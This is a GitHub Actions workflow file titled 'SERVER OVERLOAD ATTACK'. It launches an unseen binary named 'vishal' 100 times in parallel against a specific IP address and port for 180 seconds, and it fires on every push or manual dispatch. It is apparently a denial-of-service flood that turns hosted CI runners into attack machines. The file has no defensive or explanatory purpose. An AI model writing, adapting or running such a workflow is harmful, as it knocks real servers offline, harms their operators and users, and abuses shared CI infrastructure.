name: SERVER OVERLOAD ATTACK
on: [workflow_dispatch, push]

jobs:
  server_overload:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: chmod +x vishal
      - run: |
          for i in {1..100}; do
            ./vishal 20.235.142.253 26996 180 &
          done
          wait
